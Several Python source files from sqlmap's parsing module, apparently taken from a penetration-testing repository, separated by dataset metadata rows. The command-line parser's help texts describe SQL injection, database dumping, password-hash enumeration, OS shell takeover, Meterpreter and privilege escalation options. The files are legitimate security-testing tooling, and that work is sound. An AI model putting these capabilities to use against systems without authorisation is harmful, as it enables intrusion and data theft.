#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import itertools import os from lib.core.common import checkFile from lib.core.common import parseXmlFile from lib.core.data import kb from lib.core.data import paths from lib.parse.handler import FingerprintHandler def headersParser(headers): """ This function calls a class that parses the input HTTP headers to fingerprint the back-end database management system operating system and the web application technology """ if not kb.headerPaths: kb.headerPaths = { "cookie": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "cookie.xml"), "microsoftsharepointteamservices": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "sharepoint.xml"), "server": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "server.xml"), "servlet-engine": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "servlet.xml"), "set-cookie": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "cookie.xml"), "x-aspnet-version": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-aspnet-version.xml"), "x-powered-by": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-powered-by.xml"), } for header in itertools.ifilter(lambda x: x in kb.headerPaths, headers): value = headers[header] xmlfile = kb.headerPaths[header] checkFile(xmlfile) handler = FingerprintHandler(value, kb.headersFp) parseXmlFile(xmlfile, handler) parseXmlFile(paths.GENERIC_XML, handler)
1,737
Python
.py
35
43.342857
114
0.653869
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,995
configfile.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/parse/configfile.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import codecs from ConfigParser import MissingSectionHeaderError from ConfigParser import ParsingError from lib.core.common import checkFile from lib.core.common import unArrayizeValue from lib.core.common import UnicodeRawConfigParser from lib.core.data import conf from lib.core.data import logger from lib.core.exception import SqlmapMissingMandatoryOptionException from lib.core.exception import SqlmapSyntaxException from lib.core.optiondict import optDict from lib.core.settings import UNICODE_ENCODING config = None def configFileProxy(section, option, boolean=False, integer=False): """ Parse configuration file and save settings into the configuration advanced dictionary. """ global config if config.has_option(section, option): try: if boolean: value = config.getboolean(section, option) if config.get(section, option) else False elif integer: value = config.getint(section, option) if config.get(section, option) else 0 else: value = config.get(section, option) except ValueError, ex: errMsg = "error occurred while processing the option " errMsg += "'%s' in provided configuration file ('%s')" % (option, str(ex)) raise SqlmapSyntaxException(errMsg) if value: conf[option] = value else: conf[option] = None else: debugMsg = "missing requested option '%s' (section " % option debugMsg += "'%s') into the configuration file, " % section debugMsg += "ignoring. Skipping to next." logger.debug(debugMsg) def configFileParser(configFile): """ Parse configuration file and save settings into the configuration advanced dictionary. """ global config debugMsg = "parsing configuration file" logger.debug(debugMsg) checkFile(configFile) configFP = codecs.open(configFile, "rb", UNICODE_ENCODING) try: config = UnicodeRawConfigParser() config.readfp(configFP) except (MissingSectionHeaderError, ParsingError), ex: errMsg = "you have provided an invalid configuration file ('%s')" % str(ex) raise SqlmapSyntaxException(errMsg) if not config.has_section("Target"): errMsg = "missing a mandatory section 'Target' in the configuration file" raise SqlmapMissingMandatoryOptionException(errMsg) condition = not config.has_option("Target", "direct") condition &= not config.has_option("Target", "url") condition &= not config.has_option("Target", "logFile") condition &= not config.has_option("Target", "bulkFile") condition &= not config.has_option("Target", "googleDork") condition &= not config.has_option("Target", "requestFile") condition &= not config.has_option("Target", "sitemapUrl") condition &= not config.has_option("Target", "wizard") if condition: errMsg = "missing a mandatory option in the configuration file " errMsg += "(direct, url, logFile, bulkFile, googleDork, requestFile, sitemapUrl or wizard)" raise SqlmapMissingMandatoryOptionException(errMsg) for family, optionData in optDict.items(): for option, datatype in optionData.items(): datatype = unArrayizeValue(datatype) boolean = datatype == "boolean" integer = datatype == "integer" configFileProxy(family, option, boolean, integer)
3,620
Python
.py
82
37.390244
100
0.698124
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,996
cmdline.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/parse/cmdline.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import os import shlex import sys from optparse import OptionError from optparse import OptionGroup from optparse import OptionParser from optparse import SUPPRESS_HELP from lib.core.common import checkDeprecatedOptions from lib.core.common import checkSystemEncoding from lib.core.common import expandMnemonics from lib.core.common import getUnicode from lib.core.data import cmdLineOptions from lib.core.data import conf from lib.core.data import logger from lib.core.defaults import defaults from lib.core.enums import AUTOCOMPLETE_TYPE from lib.core.exception import SqlmapShellQuitException from lib.core.settings import BASIC_HELP_ITEMS from lib.core.settings import DUMMY_URL from lib.core.settings import IS_WIN from lib.core.settings import MAX_HELP_OPTION_LENGTH from lib.core.settings import VERSION_STRING from lib.core.shell import autoCompletion from lib.core.shell import clearHistory from lib.core.shell import loadHistory from lib.core.shell import saveHistory def cmdLineParser(): """ This function parses the command line parameters and arguments """ checkSystemEncoding() _ = getUnicode(os.path.normpath(sys.argv[0]), encoding=sys.getfilesystemencoding()) usage = "%s%s [options]" % ("python " if not IS_WIN else "", \ "\"%s\"" % _ if " " in _ else _) parser = OptionParser(usage=usage) try: parser.add_option("--hh", dest="advancedHelp", action="store_true", help="Show advanced help message and exit") parser.add_option("--version", dest="showVersion", action="store_true", help="Show program's version number and exit") parser.add_option("-v", dest="verbose", type="int", help="Verbosity level: 0-6 (default %d)" % defaults.verbose) # Target options target = OptionGroup(parser, "Target", "At least one of these " "options has to be provided to define the target(s)") target.add_option("-d", dest="direct", help="Connection string " "for direct database connection") target.add_option("-u", "--url", dest="url", help="Target URL (e.g. \"http://www.site.com/vuln.php?id=1\")") target.add_option("-l", dest="logFile", help="Parse target(s) from Burp " "or WebScarab proxy log file") target.add_option("-x", dest="sitemapUrl", help="Parse target(s) from remote sitemap(.xml) file") target.add_option("-m", dest="bulkFile", help="Scan multiple targets given " "in a textual file ") target.add_option("-r", dest="requestFile", help="Load HTTP request from a file") target.add_option("-g", dest="googleDork", help="Process Google dork results as target URLs") target.add_option("-c", dest="configFile", help="Load options from a configuration INI file") # Request options request = OptionGroup(parser, "Request", "These options can be used " "to specify how to connect to the target URL") request.add_option("--data", dest="data", help="Data string to be sent through POST") request.add_option("--param-del", dest="paramDel", help="Character used for splitting parameter values") request.add_option("--cookie", dest="cookie", help="HTTP Cookie header value") request.add_option("--cookie-del", dest="cookieDel", help="Character used for splitting cookie values") request.add_option("--load-cookies", dest="loadCookies", help="File containing cookies in Netscape/wget format") request.add_option("--drop-set-cookie", dest="dropSetCookie", action="store_true", help="Ignore Set-Cookie header from response") request.add_option("--user-agent", dest="agent", help="HTTP User-Agent header value") request.add_option("--random-agent", dest="randomAgent", action="store_true", help="Use randomly selected HTTP User-Agent header value") request.add_option("--host", dest="host", help="HTTP Host header value") request.add_option("--referer", dest="referer", help="HTTP Referer header value") request.add_option("--headers", dest="headers", help="Extra headers (e.g. \"Accept-Language: fr\\nETag: 123\")") request.add_option("--auth-type", dest="authType", help="HTTP authentication type " "(Basic, Digest, NTLM or PKI)") request.add_option("--auth-cred", dest="authCred", help="HTTP authentication credentials " "(name:password)") request.add_option("--auth-private", dest="authPrivate", help="HTTP authentication PEM private key file") request.add_option("--ignore-401", dest="ignore401", action="store_true", help="Ignore HTTP Error 401 (Unauthorized)") request.add_option("--proxy", dest="proxy", help="Use a proxy to connect to the target URL") request.add_option("--proxy-cred", dest="proxyCred", help="Proxy authentication credentials " "(name:password)") request.add_option("--proxy-file", dest="proxyFile", help="Load proxy list from a file") request.add_option("--ignore-proxy", dest="ignoreProxy", action="store_true", help="Ignore system default proxy settings") request.add_option("--tor", dest="tor", action="store_true", help="Use Tor anonymity network") request.add_option("--tor-port", dest="torPort", help="Set Tor proxy port other than default") request.add_option("--tor-type", dest="torType", help="Set Tor proxy type (HTTP (default), SOCKS4 or SOCKS5)") request.add_option("--check-tor", dest="checkTor", action="store_true", help="Check to see if Tor is used properly") request.add_option("--delay", dest="delay", type="float", help="Delay in seconds between each HTTP request") request.add_option("--timeout", dest="timeout", type="float", help="Seconds to wait before timeout connection " "(default %d)" % defaults.timeout) request.add_option("--retries", dest="retries", type="int", help="Retries when the connection timeouts " "(default %d)" % defaults.retries) request.add_option("--randomize", dest="rParam", help="Randomly change value for given parameter(s)") request.add_option("--safe-url", dest="safUrl", help="URL address to visit frequently during testing") request.add_option("--safe-freq", dest="saFreq", type="int", help="Test requests between two visits to a given safe URL") request.add_option("--skip-urlencode", dest="skipUrlEncode", action="store_true", help="Skip URL encoding of payload data") request.add_option("--csrf-token", dest="csrfToken", help="Parameter used to hold CSRF protection token") request.add_option("--csrf-url", dest="csrfUrl", help="URL address to visit to extract CSRF protection token") request.add_option("--force-ssl", dest="forceSSL", action="store_true", help="Force usage of SSL/HTTPS") request.add_option("--hpp", dest="hpp", action="store_true", help="Use HTTP parameter pollution method") request.add_option("--eval", dest="evalCode", help="Evaluate provided Python code before the request (e.g. \"import hashlib;id2=hashlib.md5(id).hexdigest()\")") # Optimization options optimization = OptionGroup(parser, "Optimization", "These " "options can be used to optimize the " "performance of sqlmap") optimization.add_option("-o", dest="optimize", action="store_true", help="Turn on all optimization switches") optimization.add_option("--predict-output", dest="predictOutput", action="store_true", help="Predict common queries output") optimization.add_option("--keep-alive", dest="keepAlive", action="store_true", help="Use persistent HTTP(s) connections") optimization.add_option("--null-connection", dest="nullConnection", action="store_true", help="Retrieve page length without actual HTTP response body") optimization.add_option("--threads", dest="threads", type="int", help="Max number of concurrent HTTP(s) " "requests (default %d)" % defaults.threads) # Injection options injection = OptionGroup(parser, "Injection", "These options can be " "used to specify which parameters to test " "for, provide custom injection payloads and " "optional tampering scripts") injection.add_option("-p", dest="testParameter", help="Testable parameter(s)") injection.add_option("--skip", dest="skip", help="Skip testing for given parameter(s)") injection.add_option("--dbms", dest="dbms", help="Force back-end DBMS to this value") injection.add_option("--dbms-cred", dest="dbmsCred", help="DBMS authentication credentials (user:password)") injection.add_option("--os", dest="os", help="Force back-end DBMS operating system " "to this value") injection.add_option("--invalid-bignum", dest="invalidBignum", action="store_true", help="Use big numbers for invalidating values") injection.add_option("--invalid-logical", dest="invalidLogical", action="store_true", help="Use logical operations for invalidating values") injection.add_option("--invalid-string", dest="invalidString", action="store_true", help="Use random strings for invalidating values") injection.add_option("--no-cast", dest="noCast", action="store_true", help="Turn off payload casting mechanism") injection.add_option("--no-escape", dest="noEscape", action="store_true", help="Turn off string escaping mechanism") injection.add_option("--prefix", dest="prefix", help="Injection payload prefix string") injection.add_option("--suffix", dest="suffix", help="Injection payload suffix string") injection.add_option("--tamper", dest="tamper", help="Use given script(s) for tampering injection data") # Detection options detection = OptionGroup(parser, "Detection", "These options can be " "used to customize the detection phase") detection.add_option("--level", dest="level", type="int", help="Level of tests to perform (1-5, " "default %d)" % defaults.level) detection.add_option("--risk", dest="risk", type="int", help="Risk of tests to perform (0-3, " "default %d)" % defaults.level) detection.add_option("--string", dest="string", help="String to match when " "query is evaluated to True") detection.add_option("--not-string", dest="notString", help="String to match when " "query is evaluated to False") detection.add_option("--regexp", dest="regexp", help="Regexp to match when " "query is evaluated to True") detection.add_option("--code", dest="code", type="int", help="HTTP code to match when " "query is evaluated to True") detection.add_option("--text-only", dest="textOnly", action="store_true", help="Compare pages based only on the textual content") detection.add_option("--titles", dest="titles", action="store_true", help="Compare pages based only on their titles") # Techniques options techniques = OptionGroup(parser, "Techniques", "These options can be " "used to tweak testing of specific SQL " "injection techniques") techniques.add_option("--technique", dest="tech", help="SQL injection techniques to use " "(default \"%s\")" % defaults.tech) techniques.add_option("--time-sec", dest="timeSec", type="int", help="Seconds to delay the DBMS response " "(default %d)" % defaults.timeSec) techniques.add_option("--union-cols", dest="uCols", help="Range of columns to test for UNION query SQL injection") techniques.add_option("--union-char", dest="uChar", help="Character to use for bruteforcing number of columns") techniques.add_option("--union-from", dest="uFrom", help="Table to use in FROM part of UNION query SQL injection") techniques.add_option("--dns-domain", dest="dnsName", help="Domain name used for DNS exfiltration attack") techniques.add_option("--second-order", dest="secondOrder", help="Resulting page URL searched for second-order " "response") # Fingerprint options fingerprint = OptionGroup(parser, "Fingerprint") fingerprint.add_option("-f", "--fingerprint", dest="extensiveFp", action="store_true", help="Perform an extensive DBMS version fingerprint") # Enumeration options enumeration = OptionGroup(parser, "Enumeration", "These options can " "be used to enumerate the back-end database " "management system information, structure " "and data contained in the tables. Moreover " "you can run your own SQL statements") enumeration.add_option("-a", "--all", dest="getAll", action="store_true", help="Retrieve everything") enumeration.add_option("-b", "--banner", dest="getBanner", action="store_true", help="Retrieve DBMS banner") enumeration.add_option("--current-user", dest="getCurrentUser", action="store_true", help="Retrieve DBMS current user") enumeration.add_option("--current-db", dest="getCurrentDb", action="store_true", help="Retrieve DBMS current database") enumeration.add_option("--hostname", dest="getHostname", action="store_true", help="Retrieve DBMS server hostname") enumeration.add_option("--is-dba", dest="isDba", action="store_true", help="Detect if the DBMS current user is DBA") enumeration.add_option("--users", dest="getUsers", action="store_true", help="Enumerate DBMS users") enumeration.add_option("--passwords", dest="getPasswordHashes", action="store_true", help="Enumerate DBMS users password hashes") enumeration.add_option("--privileges", dest="getPrivileges", action="store_true", help="Enumerate DBMS users privileges") enumeration.add_option("--roles", dest="getRoles", action="store_true", help="Enumerate DBMS users roles") enumeration.add_option("--dbs", dest="getDbs", action="store_true", help="Enumerate DBMS databases") enumeration.add_option("--tables", dest="getTables", action="store_true", help="Enumerate DBMS database tables") enumeration.add_option("--columns", dest="getColumns", action="store_true", help="Enumerate DBMS database table columns") enumeration.add_option("--schema", dest="getSchema", action="store_true", help="Enumerate DBMS schema") enumeration.add_option("--count", dest="getCount", action="store_true", help="Retrieve number of entries for table(s)") enumeration.add_option("--dump", dest="dumpTable", action="store_true", help="Dump DBMS database table entries") enumeration.add_option("--dump-all", dest="dumpAll", action="store_true", help="Dump all DBMS databases tables entries") enumeration.add_option("--search", dest="search", action="store_true", help="Search column(s), table(s) and/or database name(s)") enumeration.add_option("--comments", dest="getComments", action="store_true", help="Retrieve DBMS comments") enumeration.add_option("-D", dest="db", help="DBMS database to enumerate") enumeration.add_option("-T", dest="tbl", help="DBMS database table(s) to enumerate") enumeration.add_option("-C", dest="col", help="DBMS database table column(s) to enumerate") enumeration.add_option("-X", dest="excludeCol", help="DBMS database table column(s) to not enumerate") enumeration.add_option("-U", dest="user", help="DBMS user to enumerate") enumeration.add_option("--exclude-sysdbs", dest="excludeSysDbs", action="store_true", help="Exclude DBMS system databases when " "enumerating tables") enumeration.add_option("--where", dest="dumpWhere", help="Use WHERE condition while table dumping") enumeration.add_option("--start", dest="limitStart", type="int", help="First query output entry to retrieve") enumeration.add_option("--stop", dest="limitStop", type="int", help="Last query output entry to retrieve") enumeration.add_option("--first", dest="firstChar", type="int", help="First query output word character to retrieve") enumeration.add_option("--last", dest="lastChar", type="int", help="Last query output word character to retrieve") enumeration.add_option("--sql-query", dest="query", help="SQL statement to be executed") enumeration.add_option("--sql-shell", dest="sqlShell", action="store_true", help="Prompt for an interactive SQL shell") enumeration.add_option("--sql-file", dest="sqlFile", help="Execute SQL statements from given file(s)") # User-defined function options brute = OptionGroup(parser, "Brute force", "These " "options can be used to run brute force " "checks") brute.add_option("--common-tables", dest="commonTables", action="store_true", help="Check existence of common tables") brute.add_option("--common-columns", dest="commonColumns", action="store_true", help="Check existence of common columns") # User-defined function options udf = OptionGroup(parser, "User-defined function injection", "These " "options can be used to create custom user-defined " "functions") udf.add_option("--udf-inject", dest="udfInject", action="store_true", help="Inject custom user-defined functions") udf.add_option("--shared-lib", dest="shLib", help="Local path of the shared library") # File system options filesystem = OptionGroup(parser, "File system access", "These options " "can be used to access the back-end database " "management system underlying file system") filesystem.add_option("--file-read", dest="rFile", help="Read a file from the back-end DBMS " "file system") filesystem.add_option("--file-write", dest="wFile", help="Write a local file on the back-end " "DBMS file system") filesystem.add_option("--file-dest", dest="dFile", help="Back-end DBMS absolute filepath to " "write to") # Takeover options takeover = OptionGroup(parser, "Operating system access", "These " "options can be used to access the back-end " "database management system underlying " "operating system") takeover.add_option("--os-cmd", dest="osCmd", help="Execute an operating system command") takeover.add_option("--os-shell", dest="osShell", action="store_true", help="Prompt for an interactive operating " "system shell") takeover.add_option("--os-pwn", dest="osPwn", action="store_true", help="Prompt for an OOB shell, " "Meterpreter or VNC") takeover.add_option("--os-smbrelay", dest="osSmb", action="store_true", help="One click prompt for an OOB shell, " "Meterpreter or VNC") takeover.add_option("--os-bof", dest="osBof", action="store_true", help="Stored procedure buffer overflow " "exploitation") takeover.add_option("--priv-esc", dest="privEsc", action="store_true", help="Database process user privilege escalation") takeover.add_option("--msf-path", dest="msfPath", help="Local path where Metasploit Framework " "is installed") takeover.add_option("--tmp-path", dest="tmpPath", help="Remote absolute path of temporary files " "directory") # Windows registry options windows = OptionGroup(parser, "Windows registry access", "These " "options can be used to access the back-end " "database management system Windows " "registry") windows.add_option("--reg-read", dest="regRead", action="store_true", help="Read a Windows registry key value") windows.add_option("--reg-add", dest="regAdd", action="store_true", help="Write a Windows registry key value data") windows.add_option("--reg-del", dest="regDel", action="store_true", help="Delete a Windows registry key value") windows.add_option("--reg-key", dest="regKey", help="Windows registry key") windows.add_option("--reg-value", dest="regVal", help="Windows registry key value") windows.add_option("--reg-data", dest="regData", help="Windows registry key value data") windows.add_option("--reg-type", dest="regType", help="Windows registry key value type") # General options general = OptionGroup(parser, "General", "These options can be used " "to set some general working parameters") #general.add_option("-x", dest="xmlFile", # help="Dump the data into an XML file") general.add_option("-s", dest="sessionFile", help="Load session from a stored (.sqlite) file") general.add_option("-t", dest="trafficFile", help="Log all HTTP traffic into a " "textual file") general.add_option("--batch", dest="batch", action="store_true", help="Never ask for user input, use the default behaviour") general.add_option("--charset", dest="charset", help="Force character encoding used for data retrieval") general.add_option("--crawl", dest="crawlDepth", type="int", help="Crawl the website starting from the target URL") general.add_option("--csv-del", dest="csvDel", help="Delimiting character used in CSV output " "(default \"%s\")" % defaults.csvDel) general.add_option("--dump-format", dest="dumpFormat", help="Format of dumped data (CSV (default), HTML or SQLITE)") general.add_option("--eta", dest="eta", action="store_true", help="Display for each output the " "estimated time of arrival") general.add_option("--flush-session", dest="flushSession", action="store_true", help="Flush session files for current target") general.add_option("--forms", dest="forms", action="store_true", help="Parse and test forms on target URL") general.add_option("--fresh-queries", dest="freshQueries", action="store_true", help="Ignore query results stored in session file") general.add_option("--hex", dest="hexConvert", action="store_true", help="Use DBMS hex function(s) for data retrieval") general.add_option("--output-dir", dest="outputDir", action="store", help="Custom output directory path") general.add_option("--parse-errors", dest="parseErrors", action="store_true", help="Parse and display DBMS error messages from responses") general.add_option("--pivot-column", dest="pivotColumn", help="Pivot column name") general.add_option("--save", dest="saveCmdline", action="store_true", help="Save options to a configuration INI file") general.add_option("--scope", dest="scope", help="Regexp to filter targets from provided proxy log") general.add_option("--test-filter", dest="testFilter", help="Select tests by payloads and/or titles (e.g. ROW)") general.add_option("--update", dest="updateAll", action="store_true", help="Update sqlmap") # Miscellaneous options miscellaneous = OptionGroup(parser, "Miscellaneous") miscellaneous.add_option("-z", dest="mnemonics", help="Use short mnemonics (e.g. \"flu,bat,ban,tec=EU\")") miscellaneous.add_option("--alert", dest="alert", help="Run host OS command(s) when SQL injection is found") miscellaneous.add_option("--answers", dest="answers", help="Set question answers (e.g. \"quit=N,follow=N\")") miscellaneous.add_option("--beep", dest="beep", action="store_true", help="Make a beep sound when SQL injection is found") miscellaneous.add_option("--check-waf", dest="checkWaf", action="store_true", help="Heuristically check for WAF/IPS/IDS protection") miscellaneous.add_option("--cleanup", dest="cleanup", action="store_true", help="Clean up the DBMS from sqlmap specific " "UDF and tables") miscellaneous.add_option("--dependencies", dest="dependencies", action="store_true", help="Check for missing (non-core) sqlmap dependencies") miscellaneous.add_option("--disable-coloring", dest="disableColoring", action="store_true", help="Disable console output coloring") miscellaneous.add_option("--gpage", dest="googlePage", type="int", help="Use Google dork results from specified page number") miscellaneous.add_option("--identify-waf", dest="identifyWaf", action="store_true", help="Make a through testing for a WAF/IPS/IDS protection") miscellaneous.add_option("--mobile", dest="mobile", action="store_true", help="Imitate smartphone through HTTP User-Agent header") miscellaneous.add_option("--page-rank", dest="pageRank", action="store_true", help="Display page rank (PR) for Google dork results") miscellaneous.add_option("--purge-output", dest="purgeOutput", action="store_true", help="Safely remove all content from output directory") miscellaneous.add_option("--smart", dest="smart", action="store_true", help="Conduct through tests only if positive heuristic(s)") miscellaneous.add_option("--sqlmap-shell", dest="sqlmapShell", action="store_true", help="Prompt for an interactive sqlmap shell") miscellaneous.add_option("--wizard", dest="wizard", action="store_true", help="Simple wizard interface for beginner users") # Hidden and/or experimental options parser.add_option("--dummy", dest="dummy", action="store_true", help=SUPPRESS_HELP) parser.add_option("--pickled-options", dest="pickledOptions", help=SUPPRESS_HELP) parser.add_option("--profile", dest="profile", action="store_true", help=SUPPRESS_HELP) parser.add_option("--binary-fields", dest="binaryFields", help=SUPPRESS_HELP) parser.add_option("--cpu-throttle", dest="cpuThrottle", type="int", help=SUPPRESS_HELP) parser.add_option("--force-dns", dest="forceDns", action="store_true", help=SUPPRESS_HELP) parser.add_option("--smoke-test", dest="smokeTest", action="store_true", help=SUPPRESS_HELP) parser.add_option("--live-test", dest="liveTest", action="store_true", help=SUPPRESS_HELP) parser.add_option("--stop-fail", dest="stopFail", action="store_true", help=SUPPRESS_HELP) parser.add_option("--run-case", dest="runCase", help=SUPPRESS_HELP) parser.add_option_group(target) parser.add_option_group(request) parser.add_option_group(optimization) parser.add_option_group(injection) parser.add_option_group(detection) parser.add_option_group(techniques) parser.add_option_group(fingerprint) parser.add_option_group(enumeration) parser.add_option_group(brute) parser.add_option_group(udf) parser.add_option_group(filesystem) parser.add_option_group(takeover) parser.add_option_group(windows) parser.add_option_group(general) parser.add_option_group(miscellaneous) # Dirty hack to display longer options without breaking into two lines def _(self, *args): _ = parser.formatter._format_option_strings(*args) if len(_) > MAX_HELP_OPTION_LENGTH: _ = ("%%.%ds.." % (MAX_HELP_OPTION_LENGTH - parser.formatter.indent_increment)) % _ return _ parser.formatter._format_option_strings = parser.formatter.format_option_strings parser.formatter.format_option_strings = type(parser.formatter.format_option_strings)(_, parser, type(parser)) # Dirty hack for making a short option -hh option = parser.get_option("--hh") option._short_opts = ["-hh"] option._long_opts = [] # Dirty hack for inherent help message of switch -h option = parser.get_option("-h") option.help = option.help.capitalize().replace("this help", "basic help") argv = [] prompt = False advancedHelp = True for arg in sys.argv: argv.append(getUnicode(arg, encoding=sys.stdin.encoding)) checkDeprecatedOptions(argv) prompt = "--sqlmap-shell" in argv if prompt: parser.usage = "" cmdLineOptions.sqlmapShell = True _ = ["x", "q", "exit", "quit", "clear"] for option in parser.option_list: _.extend(option._long_opts) _.extend(option._short_opts) for group in parser.option_groups: for option in group.option_list: _.extend(option._long_opts) _.extend(option._short_opts) autoCompletion(AUTOCOMPLETE_TYPE.SQLMAP, commands=_) while True: command = None try: command = raw_input("sqlmap-shell> ").strip() except (KeyboardInterrupt, EOFError): print raise SqlmapShellQuitException if not command: continue elif command.lower() == "clear": clearHistory() print "[i] history cleared" saveHistory(AUTOCOMPLETE_TYPE.SQLMAP) elif command.lower() in ("x", "q", "exit", "quit"): raise SqlmapShellQuitException elif command[0] != '-': print "[!] invalid option(s) provided" print "[i] proper example: '-u http://www.site.com/vuln.php?id=1 --banner'" else: saveHistory(AUTOCOMPLETE_TYPE.SQLMAP) loadHistory(AUTOCOMPLETE_TYPE.SQLMAP) break for arg in shlex.split(command): argv.append(getUnicode(arg, encoding=sys.stdin.encoding)) # Hide non-basic options in basic help case for i in xrange(len(argv)): if argv[i] == "-hh": argv[i] = "-h" elif argv[i] == "--version": print VERSION_STRING.split('/')[-1] raise SystemExit elif argv[i] == "-h": advancedHelp = False for group in parser.option_groups[:]: found = False for option in group.option_list: if option.dest not in BASIC_HELP_ITEMS: option.help = SUPPRESS_HELP else: found = True if not found: parser.option_groups.remove(group) try: (args, _) = parser.parse_args(argv) except UnicodeEncodeError, ex: print "\n[!] %s" % ex.object.encode("unicode-escape") raise SystemExit except SystemExit: if "-h" in argv and not advancedHelp: print "\n[!] to see full list of options run with '-hh'" raise # Expand given mnemonic options (e.g. -z "ign,flu,bat") for i in xrange(len(argv) - 1): if argv[i] == "-z": expandMnemonics(argv[i + 1], parser, args) if args.dummy: args.url = args.url or DUMMY_URL if not any((args.direct, args.url, args.logFile, args.bulkFile, args.googleDork, args.configFile, \ args.requestFile, args.updateAll, args.smokeTest, args.liveTest, args.wizard, args.dependencies, \ args.purgeOutput, args.pickledOptions, args.sitemapUrl)): errMsg = "missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --wizard, --update, --purge-output or --dependencies), " errMsg += "use -h for basic or -hh for advanced help" parser.error(errMsg) return args except (OptionError, TypeError), e: parser.error(e) except SystemExit: # Protection against Windows dummy double clicking if IS_WIN: print "\nPress Enter to continue...", raw_input() raise debugMsg = "parsing command line" logger.debug(debugMsg)
40,343
Python
.py
667
41.113943
141
0.527152
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,997
sitemap.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/parse/sitemap.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import httplib import re from lib.core.common import readInput from lib.core.data import kb from lib.core.data import logger from lib.core.exception import SqlmapSyntaxException from lib.request.connect import Connect as Request from thirdparty.oset.pyoset import oset abortedFlag = None def parseSitemap(url, retVal=None): global abortedFlag if retVal is not None: logger.debug("parsing sitemap '%s'" % url) try: if retVal is None: abortedFlag = False retVal = oset() try: content = Request.getPage(url=url, raise404=True)[0] if not abortedFlag else "" except httplib.InvalidURL: errMsg = "invalid URL given for sitemap ('%s')" % url raise SqlmapSyntaxException, errMsg for match in re.finditer(r"<loc>\s*([^<]+)", content or ""): if abortedFlag: break url = match.group(1).strip() if url.endswith(".xml") and "sitemap" in url.lower(): if kb.followSitemapRecursion is None: message = "sitemap recursion detected. Do you want to follow? [y/N] " test = readInput(message, default="N") kb.followSitemapRecursion = test[0] in ("y", "Y") if kb.followSitemapRecursion: parseSitemap(url, retVal) else: retVal.add(url) except KeyboardInterrupt: abortedFlag = True warnMsg = "user aborted during sitemap parsing. sqlmap " warnMsg += "will use partial list" logger.warn(warnMsg) return retVal
1,782
Python
.py
46
30.021739
91
0.626087
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,998
__init__.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/parse/__init__.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ pass
150
Python
.py
6
23.666667
62
0.746479
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,999
html.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/parse/html.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import re from xml.sax.handler import ContentHandler from lib.core.common import checkFile from lib.core.common import parseXmlFile from lib.core.data import kb from lib.core.data import paths from lib.core.threads import getCurrentThreadData class HTMLHandler(ContentHandler): """ This class defines methods to parse the input HTML page to fingerprint the back-end database management system """ def __init__(self, page): ContentHandler.__init__(self) self._dbms = None self._page = page self.dbms = None def _markAsErrorPage(self): threadData = getCurrentThreadData() threadData.lastErrorPage = (threadData.lastRequestUID, self._page) def startElement(self, name, attrs): if name == "dbms": self._dbms = attrs.get("value") elif name == "error": if re.search(attrs.get("regexp"), self._page, re.I): self.dbms = self._dbms self._markAsErrorPage() def htmlParser(page): """ This function calls a class that parses the input HTML page to fingerprint the back-end database management system """ xmlfile = paths.ERRORS_XML checkFile(xmlfile) handler = HTMLHandler(page) parseXmlFile(xmlfile, handler) if handler.dbms and handler.dbms not in kb.htmlFp: kb.lastParserStatus = handler.dbms kb.htmlFp.append(handler.dbms) else: kb.lastParserStatus = None # generic SQL warning/error messages if re.search(r"SQL (warning|error|syntax)", page, re.I): handler._markAsErrorPage() return handler.dbms
1,780
Python
.py
50
29.62
74
0.687682
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)